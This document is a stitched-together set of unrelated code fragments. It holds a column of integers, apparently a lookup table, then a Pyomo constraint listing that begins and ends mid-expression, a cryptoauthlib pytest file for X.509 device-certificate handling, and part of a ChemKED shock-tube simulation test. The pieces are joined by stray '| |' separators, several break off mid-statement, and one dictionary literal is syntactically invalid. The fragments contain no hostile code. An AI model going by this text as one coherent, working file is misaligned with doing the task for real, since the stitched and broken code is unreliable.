-1,
933902252,
933771975,
-1,
-51285,
933833567,
66853,
-1,
933892865,
66854,
-51283,
933841474,
66827,
-1,
934030175,
66826,
934229937,
933795960,
-1,
-51280,
934165643,
66852,
-1,
934226783,
66851,
934426548,
934183246,
-1,
-51277,
934362251,
66846,
-1,
934423391,
66845,
934623159,
934377506,
-1,
-51274,
934558859,
66844,
-1,
934619999,
66843,
934819770,
934571852,
-1,
-51271,
934768904,
66842,
-1,
934816607,
66841,
935016381,
934759671,
-1,
-51268,
934956836,
66833,
-1,
935013215,
66832,
935212992,
934955715,
-1,
-51265,
935148683,
66855,
-1,
935209823,
66831,
935409602,
935144287,
66824,
-1,
935346269,
66823,
935540677,
935339359,
-1,
-51260,
935476363,
66822,
-1,
935537503,
66820,
935737288,
935468343,
-1,
-51257,
935672971,
66819,
-1,
935734111,
66818,
-51255,
935696045,
66850,
-51254,
935892538,
66849,
-51253,
935956077,
66848,
-51252,
936020119,
66847,
-51251,
936078930,
66840,
-51250,
936143436,
66839,
-51249,
936206437,
66838,
-51248,
936269776,
66834,
-51247,
936331842,
66830,
-51246,
936394845,
66829,
-51245,
936459403,
66828,
-51244,
936522677,
66825,
-51243,
936581422,
66817,
-1,
936644369,
66816,
936851420,
933374815,
-1,
936916955,
936780974,
-1,
-51239,
936871357,
128294,
-51238,
936930289,
128268,
-1,
936989453,
128161,
-1,
936864526,
128024,
-1,
936784678,
129501,
937310219,
933331278,
-1,
937375753,
937246287,
-1,
937441286,
937328881,
-1,
937506799,
937370975,
-1,
937572328,
937465976,
-1,
937637860,
937503583,
43797,
-1,
937569119,
43796,
-51227,
937592983,
43793,
-51226,
937713765,
43798,
-51225,
937771101,
43794,
-1,
937824103,
43795,
938082303,
937502613,
-1,
938096619,
937962335,
43789,
-1,
938027871,
43788,
-51220,
938051735,
43785,
-51219,
938172517,
43790,
-51218,
938229853,
43786,
-1,
938282855,
43787,
938489847,
937434803,
-1,
938555378,
938421087,
43813,
-1,
938486623,
43812,
938686452,
938479377,
43808,
-1,
938610449,
43811,
-51211,
938641559,
43809,
-51210,
938762341,
43814,
-1,
938819677,
43810,
939014143,
938416400,
-1,
939079674,
938945375,
43821,
-1,
939010911,
43820,
939210748,
939003665,
43816,
-1,
939134737,
43819,
-51203,
939165847,
43817,
-51202,
939286629,
43822,
-1,
939343965,
43818,
939589631,
938968973,
-1,
939603970,
939469663,
43781,
-1,
939535199,
43780,
-51197,
939559063,
43777,
-51196,
939679845,
43782,
-51195,
939737181,
43778,
-1,
939790183,
43779,
940048383,
937370121,
-1,
-51192,
939954389,
4958,
-1,
939997352,
4957,
-51190,
937334258,
983047,
-1,
940120098,
983096,
940324896,
937252372,
-1,
940390424,
940270002,
-1,
940455955,
940333607,
-1,
-51185,
940379337,
127999,
-51184,
940444703,
127998,
-51183,
940510083,
127997,
-51182,
940575434,
127996,
-1,
940640738,
127995,
940900351,
940384850,
-1,
-51179,
940806930,
129459,
-51178,
940863893,
129456,
-51177,
940909830,
129457,
-1,
940972194,
129458,
941228031,
940338552,
-1,
941242397,
941121300,
128453,
941359103,
941163471,
-1,
-51172,
941242509,
128454,
-1,
941303135,
128455,
941504543,
941189428,
128460,
-1,
941455394,
128461,
-1,
941434960,
128459,
941701170,
940268375,
-1,
941766701,
941630817,
-1,
941832236,
941711661,
-1,
941897767,
941785422,
-1,
941963302,
941846612,
983048,
-1,
941883643,
983095,
-1,
941896457,
983046,
-51160,
941849014,
983134,
-51159,
942107998,
983178,
-51158,
942168046,
983099,
-51157,
942232448,
983064,
-1,
942291569,
983177,
-1,
941790183,
128282,
942553136,
941723328,
-1,
-51153,
942494569,
128388,
-1,
942549688,
128233,
942800895,
942501421,
983051,
-1,
942705298,
983050,
942880831,
941659634,
-1,
942946366,
942835218,
-1,
943011901,
942878418,
-1,
943077432,
942969525,
-1,
-51145,
943029922,
128915,
-1,
943071278,
128905,
943274043,
943028258,
-1,
-51142,
943212939,
128954,
-1,
943264451,
128942,
-51140,
943209047,
128935,
-1,
943404318,
128948,
-1,
942937870,
128125,
-1,
942894395,
128529,
943732810,
942804753,
-1,
943798345,
943681356,
128066,
943863878,
943751968,
-1,
943929413,
943787793,
-1,
-51132,
943881221,
127759,
-1,
943937742,
127758,
-1,
943862293,
127757,
944242687,
943784724,
-1,
-51128,
944141093,
127806,
-1,
944199372,
127805,
-1,
943733225,
129413,
944453709,
943691593,
128065,
-51124,
944404514,
128064,
-1,
944454113,
128083,
944650321,
944404514,
-1,
944715856,
944577847,
983104,
-1,
944641197,
983103,
-1,
944639761,
983135,
944912469,
944595045,
-1,
-51117,
944865614,
983049,
-51116,
944920084,
983100,
-1,
944983287,
983067,
945174616,
944868704,
-1,
-51113,
945122500,
127972,
-1,
945167961,
127984,
945371227,
945124846,
-1,
-51110,
945326137,
11249,
-1,
945382148,
11248,
-51108,
945327862,
127794,
-51107,
945516162,
11257,
-51106,
945580299,
983179,
-51105,
945633513,
129370,
-1,
945686615,
128231,
945895657,
933249117,
-1,
945961179,
945838935,
-1,
946026692,
945890655,
983129,
946092227,
945963101,
-1,
946157762,
946019658,
-1,
946223289,
946102260,
-1,
946288759,
946176334,
-1,
946354286,
946245913,
-1,
946419820,
946298981,
126066,
946536447,
946339840,
-1,
-51093,
946439060,
126093,
-1,
946487312,
126084,
946733055,
946352099,
126075,
-1,
946603209,
126102,
946813045,
946289351,
-1,
946878579,
946762178,
126067,
946995199,
946798592,
-1,
-51086,
946897812,
126094,
-1,
946946064,
126085,
947191807,
946816993,
126076,
-1,
947061961,
126103,
947322879,
946745070,
126074,
-1,
947193033,
126101,
947402884,
946239522,
-1,
947468414,
947341693,
126070,
947533947,
947423355,
126079,
-1,
947455177,
126106,
947716095,
947453952,
-1,
-51075,
947618708,
126097,
-1,
947666960,
126088,
947912703,
947401270,
126071,
947927169,
947816571,
126080,
-1,
947848393,
126107,
948109311,
947847168,
-1,
-51069,
948011924,
126098,
-1,
948060176,
126089,
948254867,
947335974,
-1,
948320396,
948199525,
-1,
948385930,
948276448,
126068,
948502527,
948305920,
-1,
-51063,
948405140,
126095,
-1,
948453392,
126086,
948699135,
948336611,
126077,
-1,
948569289,
126104,
948830207,
948256861,
-1,
948844689,
948735597,
126069,
948961279,
948764672,
-1,
-51056,
948863892,
126096,
-1,
948912144,
126087,
949157887,
948778900,
126078,
-1,
949028041,
126105,
949237920,
948202801,
-1,
949303447,
949190990,
-1,
-51050,
949261526,
126116,
-1,
| |
+ m.b24 - m.b25 <= 0)
m.c377 = Constraint(expr= - m.b1 + m.b4 - m.b26 <= 0)
m.c378 = Constraint(expr= - m.b1 + m.b6 - m.b27 <= 0)
m.c379 = Constraint(expr= - m.b1 + m.b8 - m.b28 <= 0)
m.c380 = Constraint(expr= - m.b1 + m.b10 - m.b29 <= 0)
m.c381 = Constraint(expr= - m.b1 + m.b12 - m.b30 <= 0)
m.c382 = Constraint(expr= - m.b1 + m.b14 - m.b31 <= 0)
m.c383 = Constraint(expr= - m.b1 + m.b16 - m.b32 <= 0)
m.c384 = Constraint(expr= - m.b1 + m.b18 - m.b33 <= 0)
m.c385 = Constraint(expr= - m.b1 + m.b20 - m.b34 <= 0)
m.c386 = Constraint(expr= - m.b1 + m.b22 - m.b35 <= 0)
m.c387 = Constraint(expr= - m.b1 + m.b24 - m.b36 <= 0)
m.c388 = Constraint(expr= - m.b4 + m.b6 - m.b37 <= 0)
m.c389 = Constraint(expr= - m.b4 + m.b8 - m.b38 <= 0)
m.c390 = Constraint(expr= - m.b4 + m.b10 - m.b39 <= 0)
m.c391 = Constraint(expr= - m.b4 + m.b12 - m.b40 <= 0)
m.c392 = Constraint(expr= - m.b4 + m.b14 - m.b41 <= 0)
m.c393 = Constraint(expr= - m.b4 + m.b16 - m.b42 <= 0)
m.c394 = Constraint(expr= - m.b4 + m.b18 - m.b43 <= 0)
m.c395 = Constraint(expr= - m.b4 + m.b20 - m.b44 <= 0)
m.c396 = Constraint(expr= - m.b4 + m.b22 - m.b45 <= 0)
m.c397 = Constraint(expr= - m.b4 + m.b24 - m.b46 <= 0)
m.c398 = Constraint(expr= - m.b6 + m.b8 - m.b47 <= 0)
m.c399 = Constraint(expr= - m.b6 + m.b10 - m.b48 <= 0)
m.c400 = Constraint(expr= - m.b6 + m.b12 - m.b49 <= 0)
m.c401 = Constraint(expr= - m.b6 + m.b14 - m.b50 <= 0)
m.c402 = Constraint(expr= - m.b6 + m.b16 - m.b51 <= 0)
m.c403 = Constraint(expr= - m.b6 + m.b18 - m.b52 <= 0)
m.c404 = Constraint(expr= - m.b6 + m.b20 - m.b53 <= 0)
m.c405 = Constraint(expr= - m.b6 + m.b22 - m.b54 <= 0)
m.c406 = Constraint(expr= - m.b6 + m.b24 - m.b55 <= 0)
m.c407 = Constraint(expr= - m.b8 + m.b10 - m.b56 <= 0)
m.c408 = Constraint(expr= - m.b8 + m.b12 - m.b57 <= 0)
m.c409 = Constraint(expr= - m.b8 + m.b14 - m.b58 <= 0)
m.c410 = Constraint(expr= - m.b8 + m.b16 - m.b59 <= 0)
m.c411 = Constraint(expr= - m.b8 + m.b18 - m.b60 <= 0)
m.c412 = Constraint(expr= - m.b8 + m.b20 - m.b61 <= 0)
m.c413 = Constraint(expr= - m.b8 + m.b22 - m.b62 <= 0)
m.c414 = Constraint(expr= - m.b8 + m.b24 - m.b63 <= 0)
m.c415 = Constraint(expr= - m.b10 + m.b12 - m.b64 <= 0)
m.c416 = Constraint(expr= - m.b10 + m.b14 - m.b65 <= 0)
m.c417 = Constraint(expr= - m.b10 + m.b16 - m.b66 <= 0)
m.c418 = Constraint(expr= - m.b10 + m.b18 - m.b67 <= 0)
m.c419 = Constraint(expr= - m.b10 + m.b20 - m.b68 <= 0)
m.c420 = Constraint(expr= - m.b10 + m.b22 - m.b69 <= 0)
m.c421 = Constraint(expr= - m.b10 + m.b24 - m.b70 <= 0)
m.c422 = Constraint(expr= - m.b12 + m.b14 - m.b71 <= 0)
m.c423 = Constraint(expr= - m.b12 + m.b16 - m.b72 <= 0)
m.c424 = Constraint(expr= - m.b12 + m.b18 - m.b73 <= 0)
m.c425 = Constraint(expr= - m.b12 + m.b20 - m.b74 <= 0)
m.c426 = Constraint(expr= - m.b12 + m.b22 - m.b75 <= 0)
m.c427 = Constraint(expr= - m.b12 + m.b24 - m.b76 <= 0)
m.c428 = Constraint(expr= - m.b14 + m.b16 - m.b77 <= 0)
m.c429 = Constraint(expr= - m.b14 + m.b18 - m.b78 <= 0)
m.c430 = Constraint(expr= - m.b14 + m.b20 - m.b79 <= 0)
m.c431 = Constraint(expr= - m.b14 + m.b22 - m.b80 <= 0)
m.c432 = Constraint(expr= - m.b14 + m.b24 - m.b81 <= 0)
m.c433 = Constraint(expr= - m.b16 + m.b18 - m.b82 <= 0)
m.c434 = Constraint(expr= - m.b16 + m.b20 - m.b83 <= 0)
m.c435 = Constraint(expr= - m.b16 + m.b22 - m.b84 <= 0)
m.c436 = Constraint(expr= - m.b16 + m.b24 - m.b85 <= 0)
m.c437 = Constraint(expr= - m.b18 + m.b20 - m.b86 <= 0)
m.c438 = Constraint(expr= - m.b18 + m.b22 - m.b87 <= 0)
m.c439 = Constraint(expr= - m.b18 + m.b24 - m.b88 <= 0)
m.c440 = Constraint(expr= - m.b20 + m.b22 - m.b89 <= 0)
m.c441 = Constraint(expr= - m.b20 + m.b24 - m.b90 <= 0)
m.c442 = Constraint(expr= - m.b22 + m.b24 - m.b91 <= 0)
m.c443 = Constraint(expr= - m.b2 + m.b5 - m.b26 <= 0)
m.c444 = Constraint(expr= - m.b2 + m.b7 - m.b27 <= 0)
m.c445 = Constraint(expr= - m.b2 + m.b9 - m.b28 <= 0)
m.c446 = Constraint(expr= - m.b2 + m.b11 - m.b29 <= 0)
m.c447 = Constraint(expr= - m.b2 + m.b13 - m.b30 <= 0)
m.c448 = Constraint(expr= - m.b2 + m.b15 - m.b31 <= 0)
m.c449 = Constraint(expr= - m.b2 + m.b17 - m.b32 <= 0)
m.c450 = Constraint(expr= - m.b2 + m.b19 - m.b33 <= 0)
m.c451 = Constraint(expr= - m.b2 + m.b21 - m.b34 <= 0)
m.c452 = Constraint(expr= - m.b2 + m.b23 - m.b35 <= 0)
m.c453 = Constraint(expr= - m.b2 + m.b25 - m.b36 <= 0)
m.c454 = Constraint(expr= - m.b5 + m.b7 - m.b37 <= 0)
m.c455 = Constraint(expr= - m.b5 + m.b9 - m.b38 <= 0)
m.c456 = Constraint(expr= - m.b5 + m.b11 - m.b39 <= 0)
m.c457 = Constraint(expr= - m.b5 + m.b13 - m.b40 <= 0)
m.c458 = Constraint(expr= - m.b5 + m.b15 - m.b41 <= 0)
m.c459 = Constraint(expr= - m.b5 + m.b17 - m.b42 <= 0)
m.c460 = Constraint(expr= - m.b5 + m.b19 - m.b43 <= 0)
m.c461 = Constraint(expr= - m.b5 + m.b21 - m.b44 <= 0)
m.c462 = Constraint(expr= - m.b5 + m.b23 - m.b45 <= 0)
m.c463 = Constraint(expr= - m.b5 + m.b25 - m.b46 <= 0)
m.c464 = Constraint(expr= - m.b7 + m.b9 - m.b47 <= 0)
m.c465 = Constraint(expr= - m.b7 + m.b11 - m.b48 <= 0)
m.c466 = Constraint(expr= - m.b7 + m.b13 - m.b49 <= 0)
m.c467 = Constraint(expr= - m.b7 + m.b15 - m.b50 <= 0)
m.c468 = Constraint(expr= - m.b7 + m.b17 - m.b51 <= 0)
m.c469 = Constraint(expr= - m.b7 + m.b19 - m.b52 <= 0)
m.c470 = Constraint(expr= - m.b7 + m.b21 - m.b53 <= 0)
m.c471 = Constraint(expr= - m.b7 + m.b23 - m.b54 <= 0)
m.c472 = Constraint(expr= - m.b7 + m.b25 - m.b55 <= 0)
m.c473 = Constraint(expr= - m.b9 + m.b11 - m.b56 <= 0)
m.c474 = Constraint(expr= - m.b9 + m.b13 - m.b57 <= 0)
m.c475 = Constraint(expr= - m.b9 + m.b15 - m.b58 <= 0)
m.c476 = Constraint(expr= - m.b9 + m.b17 - m.b59 <= 0)
m.c477 = Constraint(expr= - m.b9 + m.b19 - m.b60 <= 0)
m.c478 = Constraint(expr= - m.b9 + m.b21 - m.b61 <= 0)
m.c479 = Constraint(expr= - m.b9 + m.b23 - m.b62 <= 0)
m.c480 = Constraint(expr= - m.b9 + m.b25 - m.b63 <= 0)
m.c481 = Constraint(expr= - m.b11 + m.b13 - m.b64 <= 0)
m.c482 = Constraint(expr= - m.b11 + m.b15 - m.b65 <= 0)
m.c483 = Constraint(expr= - m.b11 + m.b17 - m.b66 <= 0)
m.c484 = Constraint(expr= - m.b11 + m.b19 - m.b67 <= 0)
m.c485 = Constraint(expr= - m.b11 + m.b21 - m.b68 <= 0)
m.c486 = Constraint(expr= - m.b11 + m.b23 - m.b69 <= 0)
m.c487 = Constraint(expr= - m.b11 + m.b25 - m.b70 <= 0)
m.c488 = Constraint(expr= - m.b13 + m.b15 - m.b71 <= 0)
m.c489 = Constraint(expr= - m.b13 + m.b17 - m.b72 <= 0)
m.c490 = Constraint(expr= - m.b13 + m.b19 - m.b73 <= 0)
m.c491 = Constraint(expr= - m.b13 + m.b21 - m.b74 <= 0)
m.c492 = Constraint(expr= - m.b13 + m.b23 - m.b75 <= 0)
m.c493 = Constraint(expr= - m.b13 + m.b25 - m.b76 <= 0)
m.c494 = Constraint(expr= - m.b15 + m.b17 - m.b77 <= 0)
m.c495 = Constraint(expr= - m.b15 + m.b19 - m.b78 <= 0)
m.c496 = Constraint(expr= - m.b15 + m.b21 - m.b79 <= 0)
m.c497 = Constraint(expr= - m.b15 + m.b23 - m.b80 <= 0)
m.c498 = Constraint(expr= - m.b15 + m.b25 - m.b81 <= 0)
m.c499 = Constraint(expr= - m.b17 + m.b19 - m.b82 <= 0)
m.c500 = Constraint(expr= - m.b17 + m.b21 - m.b83 <= 0)
m.c501 = Constraint(expr= - m.b17 + m.b23 - m.b84 <= 0)
m.c502 = Constraint(expr= - m.b17 + m.b25 - m.b85 <= 0)
m.c503 = Constraint(expr= - m.b19 + m.b21 - m.b86 <= 0)
m.c504 = Constraint(expr= - m.b19 | |
<reponame>pjaos/atca<gh_stars>10-100
import datetime
import base64
import binascii
import pytest
import pytz
from datetime import datetime
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ec
from ctypes import sizeof, create_string_buffer, memmove, addressof, c_uint8, POINTER
from cryptoauthlib import *
from cryptoauthlib.library import load_cryptoauthlib, get_size_by_name
from cryptoauthlib_mock import atcab_mock
ATCACERT_DEF_DEVICE_VECTOR = bytearray.fromhex(
'00 00 00 00 02 00 00 0A 00 00 00 07 00 00 00 00'
'00 00 00 00 00 01 00 00 00 04 00 00 00 04 00 4F'
'01 00 02 00 00 00 00 01 00 00 40 00 02 00 00 00'
'0A 00 00 00 48 00 CF 00 40 00 5F 01 4B 00 65 00'
'0D 00 00 00 00 00 5D 00 04 00 0F 00 10 00 3F 01'
'14 00 1E 01 14 00 00 00 00 00 00 00 00 00 00 00'
'00 00 00 00 00 00 00 00 00')
ATCACERT_DEF_DEVICE_CONFIG = {
'type': atcacert_cert_type_t.CERTTYPE_X509,
'template_id': 2,
'chain_id': 0,
'private_key_slot': 0,
'sn_source': atcacert_cert_sn_src_t.SNSRC_PUB_KEY_HASH,
'cert_sn_dev_loc': {
'zone': atcacert_device_zone_t.DEVZONE_NONE,
'slot': 0,
'is_genkey': 0,
'offset': 0,
'count': 0
},
'issue_date_format': atcacert_date_format_t.DATEFMT_RFC5280_UTC,
'expire_date_format': atcacert_date_format_t.DATEFMT_RFC5280_GEN,
'tbs_cert_loc': {'offset': 4, 'count': 335},
'expire_years': 0,
'public_key_dev_loc': {
'zone': atcacert_device_zone_t.DEVZONE_DATA,
'slot': 0,
'is_genkey': 1,
'offset': 0,
'count': 64
},
'comp_cert_dev_loc': {
'zone': atcacert_device_zone_t.DEVZONE_DATA,
'slot': 10,
'is_genkey': 0,
'offset': 0,
'count': 72
},
'std_cert_elements' : [
{'offset': 207, 'count': 64},
{'offset': 351, 'count': 75},
{'offset': 101, 'count': 13},
{'offset': 0, 'count': 0},
{'offset': 93, 'count': 4},
{'offset': 15, 'count': 16},
{'offset': 319, 'count': 20},
{'offset': 286, 'count': 20},
]
}
ATCACERT_DEF_DEVICE_TEMPLATE_VECTOR = bytearray([
0x30, 0x82, 0x01, 0xa6, 0x30, 0x82, 0x01, 0x4b, 0xa0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x10, 0x41,
0xa6, 0x8b, 0xe4, 0x36, 0xdd, 0xc3, 0xd8, 0x39, 0xfa, 0xbd, 0xd7, 0x27, 0xd9, 0x74, 0xe7, 0x30,
0x0a, 0x06, 0x08, 0x2a, 0x86, 0x48, 0xce, 0x3d, 0x04, 0x03, 0x02, 0x30, 0x34, 0x31, 0x14, 0x30,
0x12, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x0c, 0x0b, 0x45, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x20,
0x49, 0x6e, 0x63, 0x31, 0x1c, 0x30, 0x1a, 0x06, 0x03, 0x55, 0x04, 0x03, 0x0c, 0x13, 0x45, 0x78,
0x61, 0x6d, 0x70, 0x6c, 0x65, 0x20, 0x53, 0x69, 0x67, 0x6e, 0x65, 0x72, 0x20, 0x46, 0x46, 0x46,
0x46, 0x30, 0x20, 0x17, 0x0d, 0x31, 0x37, 0x30, 0x37, 0x31, 0x30, 0x32, 0x30, 0x30, 0x30, 0x30,
0x30, 0x5a, 0x18, 0x0f, 0x33, 0x30, 0x30, 0x30, 0x31, 0x32, 0x33, 0x31, 0x32, 0x33, 0x35, 0x39,
0x35, 0x39, 0x5a, 0x30, 0x2f, 0x31, 0x14, 0x30, 0x12, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x0c, 0x0b,
0x45, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x20, 0x49, 0x6e, 0x63, 0x31, 0x17, 0x30, 0x15, 0x06,
0x03, 0x55, 0x04, 0x03, 0x0c, 0x0e, 0x45, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x20, 0x44, 0x65,
0x76, 0x69, 0x63, 0x65, 0x30, 0x59, 0x30, 0x13, 0x06, 0x07, 0x2a, 0x86, 0x48, 0xce, 0x3d, 0x02,
0x01, 0x06, 0x08, 0x2a, 0x86, 0x48, 0xce, 0x3d, 0x03, 0x01, 0x07, 0x03, 0x42, 0x00, 0x04, 0x96,
0x27, 0xf1, 0x3e, 0x80, 0xac, 0xf9, 0xd4, 0x12, 0xce, 0x3b, 0x0d, 0x68, 0xf7, 0x4e, 0xb2, 0xc6,
0x07, 0x35, 0x00, 0xb7, 0x78, 0x5b, 0xac, 0xe6, 0x50, 0x30, 0x54, 0x77, 0x7f, 0xc8, 0x62, 0x21,
0xce, 0xf2, 0x5a, 0x9a, 0x9e, 0x86, 0x40, 0xc2, 0x29, 0xd6, 0x4a, 0x32, 0x1e, 0xb9, 0x4a, 0x1b,
0x1c, 0x94, 0xf5, 0x39, 0x88, 0xae, 0xfe, 0x49, 0xcc, 0xfd, 0xbf, 0x8a, 0x0d, 0x34, 0xb8, 0xa3,
0x42, 0x30, 0x40, 0x30, 0x1d, 0x06, 0x03, 0x55, 0x1d, 0x0e, 0x04, 0x16, 0x04, 0x14, 0x2d, 0xda,
0x6c, 0x36, 0xd5, 0xa5, 0x5a, 0xce, 0x97, 0x10, 0x3d, 0xbb, 0xaf, 0x9c, 0x66, 0x2a, 0xcd, 0x3e,
0xe6, 0xcf, 0x30, 0x1f, 0x06, 0x03, 0x55, 0x1d, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0xc6,
0x70, 0xe0, 0x5e, 0x8a, 0x45, 0x0d, 0xb8, 0x2c, 0x00, 0x2a, 0x40, 0x06, 0x39, 0x4c, 0x19, 0x58,
0x04, 0x35, 0x76, 0x30, 0x0a, 0x06, 0x08, 0x2a, 0x86, 0x48, 0xce, 0x3d, 0x04, 0x03, 0x02, 0x03,
0x49, 0x00, 0x30, 0x46, 0x02, 0x21, 0x00, 0xe1, 0xfc, 0x00, 0x23, 0xc1, 0x3d, 0x01, 0x3f, 0x22,
0x31, 0x0b, 0xf0, 0xb8, 0xf4, 0xf4, 0x22, 0xfc, 0x95, 0x96, 0x33, 0x9c, 0xb9, 0x62, 0xb1, 0xfc,
0x8a, 0x2d, 0xa8, 0x5c, 0xee, 0x67, 0x72, 0x02, 0x21, 0x00, 0xa1, 0x0d, 0x47, 0xe4, 0xfd, 0x0d,
0x15, 0xd8, 0xde, 0xa1, 0xb5, 0x96, 0x28, 0x4e, 0x7a, 0x0b, 0xbe, 0xcc, 0xec, 0xe8, 0x8e, 0xcc,
0x7a, 0x31, 0xb3, 0x00, 0x8b, 0xc0, 0x2e, 0x4f, 0x99, 0xc5
])
def pretty_print_hex(a, l=16, indent=''):
"""
Format a list/bytes/bytearray object into a formatted ascii hex string
"""
s = ''
a = bytearray(a)
for x in range(0, len(a), l):
s += indent + ''.join(['%02X ' % y for y in a[x:x+l]]) + '\n'
return s
def pubnums_to_bytes(pub_nums):
return bytes(bytearray.fromhex('%064X%064X' % (pub_nums.x, pub_nums.y)))
def device_cert_sn(size, builder):
"""Cert serial number is the SHA256(Subject public key + Encoded dates)"""
# Get the public key as X and Y integers concatenated
pubkey = pubnums_to_bytes(builder._public_key.public_numbers())
# Get the encoded dates
expire_years = 0
enc_dates = bytearray(b'\x00'*3)
enc_dates[0] = (enc_dates[0] & 0x07) | ((((builder._not_valid_before.year - 2000) & 0x1F) << 3) & 0xFF)
enc_dates[0] = (enc_dates[0] & 0xF8) | ((((builder._not_valid_before.month) & 0x0F) >> 1) & 0xFF)
enc_dates[1] = (enc_dates[1] & 0x7F) | ((((builder._not_valid_before.month) & 0x0F) << 7) & 0xFF)
enc_dates[1] = (enc_dates[1] & 0x83) | (((builder._not_valid_before.day & 0x1F) << 2) & 0xFF)
enc_dates[1] = (enc_dates[1] & 0xFC) | (((builder._not_valid_before.hour & 0x1F) >> 3) & 0xFF)
enc_dates[2] = (enc_dates[2] & 0x1F) | (((builder._not_valid_before.hour & 0x1F) << 5) & 0xFF)
enc_dates[2] = (enc_dates[2] & 0xE0) | ((expire_years & 0x1F) & 0xFF)
enc_dates = bytes(enc_dates)
# SAH256 hash of the public key and encoded dates
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(pubkey)
digest.update(enc_dates)
raw_sn = bytearray(digest.finalize()[:size])
raw_sn[0] = raw_sn[0] & 0x7F # Force MSB bit to 0 to ensure positive integer
raw_sn[0] = raw_sn[0] | 0x40 # Force next bit to 1 to ensure the integer won't be trimmed in ASN.1 DER encoding
try:
return int.from_bytes(raw_sn, byteorder='big', signed=False)
except AttributeError:
return int(binascii.hexlify(raw_sn), 16)
def create_device_cert(cert_def):
# Load device public key
public_key = bytearray(64)
assert Status.ATCA_SUCCESS == atcab_get_pubkey(cert_def.public_key_dev_loc.slot, public_key)
# Convert to the key to PEM format
public_key_pem = bytearray.fromhex('3059301306072A8648CE3D020106082A8648CE3D03010703420004') + public_key
public_key_pem = '-----BEGIN PUBLIC KEY-----\n' + base64.b64encode(public_key_pem).decode('ascii') + '\n-----END PUBLIC KEY-----'
# Convert the key into the cryptography format
public_key = serialization.load_pem_public_key(public_key_pem.encode('ascii'), default_backend())
# Create the private key
signer_private_key = ec.generate_private_key(ec.SECP256R1(), default_backend())
signer_public_key = signer_private_key.public_key()
# Create the certificate builder
builder = x509.CertificateBuilder()
# Ordinarily we'd construct a signer cert first, but we'll skip that and just create the fields we need
builder = builder.issuer_name(x509.Name([
x509.NameAttribute(x509.oid.NameOID.ORGANIZATION_NAME, u'Example Inc'),
x509.NameAttribute(x509.oid.NameOID.COMMON_NAME, u'Example Signer FFFF')]))
# Device cert must have minutes and seconds set to 0
builder = builder.not_valid_before(datetime.now(tz=pytz.utc).replace(minute=0, second=0))
# Should be year 9999, but this doesn't work on windows
builder = builder.not_valid_after(datetime(3000, 12, 31, 23, 59, 59))
builder = builder.subject_name(x509.Name([
x509.NameAttribute(x509.oid.NameOID.ORGANIZATION_NAME, u'Example Inc'),
x509.NameAttribute(x509.oid.NameOID.COMMON_NAME, u'Example Device')]))
builder = builder.public_key(public_key)
# Device certificate is generated from certificate dates and public key
builder = builder.serial_number(device_cert_sn(16, builder))
# Subject Key ID is used as the thing name and MQTT client ID and is required for this demo
builder = builder.add_extension(
x509.SubjectKeyIdentifier.from_public_key(public_key),
critical=False)
# Add the authority key id from the signer key
builder = builder.add_extension(
x509.AuthorityKeyIdentifier.from_issuer_public_key(signer_public_key),
critical=False)
# Sign certificate
device_cert = builder.sign(private_key=signer_private_key, algorithm=hashes.SHA256(), backend=default_backend())
# Get the certificate bytes
device_cert_bytes = device_cert.public_bytes(encoding=serialization.Encoding.DER)
# Convert the signer public key into the uncompressed numbers format
signer_public_key_bytes = pubnums_to_bytes(signer_public_key.public_numbers())
return device_cert_bytes, signer_public_key_bytes
@pytest.fixture
def test_atcacert_init():
"""
Run tests against the library mock
"""
load_cryptoauthlib(atcab_mock())
@pytest.fixture
def test_atcacert_init_lib(test_init_with_lib):
"""
Run tests against a built library on the platform
"""
load_cryptoauthlib()
@pytest.fixture
def test_atcacert_init_live(test_init_with_device):
"""
Use real hardware for these tests - otherwise skip
"""
load_cryptoauthlib()
if Status.ATCA_SUCCESS != atcab_init(cfg_ateccx08a_kithid_default()):
raise Exception('Unable to connect to a device')
@pytest.mark.parametrize("struct_name", [
pytest.param('atcacert_device_loc_t'),
pytest.param('atcacert_cert_loc_t'),
pytest.param('atcacert_cert_element_t'),
pytest.param('atcacert_def_t'),
pytest.param('atcacert_tm_utc_t')
])
def test_atcacert_struct_sizes(test_atcacert_init_lib, struct_name):
assert sizeof(eval(struct_name)) == get_size_by_name(struct_name)
# --------------------ATCACERT_DEF----------------------
def test_atcacert_get_response(test_atcacert_init):
device_private_key_slot = 1
challenge = bytearray(32)
response = bytearray(64)
assert atcacert_get_response(device_private_key_slot, challenge, response) == CertStatus.ATCACERT_E_SUCCESS
assert response == bytearray(atcab_mock.r_response)
def test_atcacert_read_cert(test_atcacert_init):
cert_def = atcacert_def_t()
ca_public_key = bytearray(64)
cert = bytearray(65)
cert_size = AtcaReference(len(cert))
assert atcacert_read_cert(cert_def, ca_public_key, cert, cert_size) == CertStatus.ATCACERT_E_SUCCESS
assert cert == bytearray(atcab_mock.r_cert)
assert cert_size.value == atcab_mock.r_cert_size.value
def test_atcacert_write_cert(test_atcacert_init):
cert_def = atcacert_def_t()
cert = bytearray(64)
cert_size = 64
assert atcacert_write_cert(cert_def, cert, cert_size) == CertStatus.ATCACERT_E_SUCCESS
def test_atcacert_create_csr(test_atcacert_init):
| |
= pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
properties.datapoints[0].ignition_type['target'] = 'temperature'
properties.datapoints[1].ignition_type['target'] = 'temperature'
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'<KEY>', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY)
# Only thing different from last test: ignition target is temperature
assert sim.properties.ignition_target == 'temperature'
sim = simulations[1]
sim.setup_case(mechanism_filename, SPEC_KEY)
# Only thing different from last test: ignition target is temperature
assert sim.properties.ignition_target == 'temperature'
def test_shock_tube_pressure_rise_setup_case(self):
"""Test that shock tube case with pressure rise is set up properly.
"""
file_path = os.path.join('testfile_st2.yaml')
